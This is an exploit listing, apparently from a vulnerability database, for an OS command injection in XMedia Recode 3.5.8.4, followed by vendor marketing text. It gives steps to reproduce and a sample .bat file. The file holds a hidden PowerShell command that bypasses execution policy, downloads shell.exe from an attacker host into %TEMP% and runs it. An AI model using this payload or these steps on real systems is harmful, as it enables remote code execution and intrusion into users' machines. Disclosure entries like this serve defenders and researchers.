Lucene search
K

XMedia Recode 3.5.8.4 Command Injection

🗓️ 11 Mar 2025 00:00:00Reported by Ahmet Ümit BayramType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 192 Views

XMedia Recode version 3.5.8.4 allows OS command injection via a malicious .bat file.

Code
Exploit Title: XMedia Recode v3.5.8.4 - OS Command Injection
    Discovered by: Ahmet Ümit BAYRAM
    Discovered Date: 16.09.2023
    Vendor Homepage: https://www.xmedia-recode.de
    Software Link: https://www.xmedia-recode.de/download/
    XMediaRecode3584_setup.exe
    Tested Version: v3.5.8.4 (latest)
    Tested on: Windows 2019 Server 64bit
    Steps to Reproduce
    
    Create a .bat file that contains your reverse shell command.
    Launch XMedia Recode.
    Click on the Open button located at the bottom right.
    Select the .bat file you created.
    The reverse shell should now be active, connecting to your listener.
    
    Example of Reverse Shell Command in .bat
    
    To create a reverse shell in a .bat file, you can use the following command:
    
    @echo off
    powershell -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-WebRequest
    -Uri http://attacker_ip:port -OutFile %TEMP%\shell.exe; Start-Process
    %TEMP%\shell.exe"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation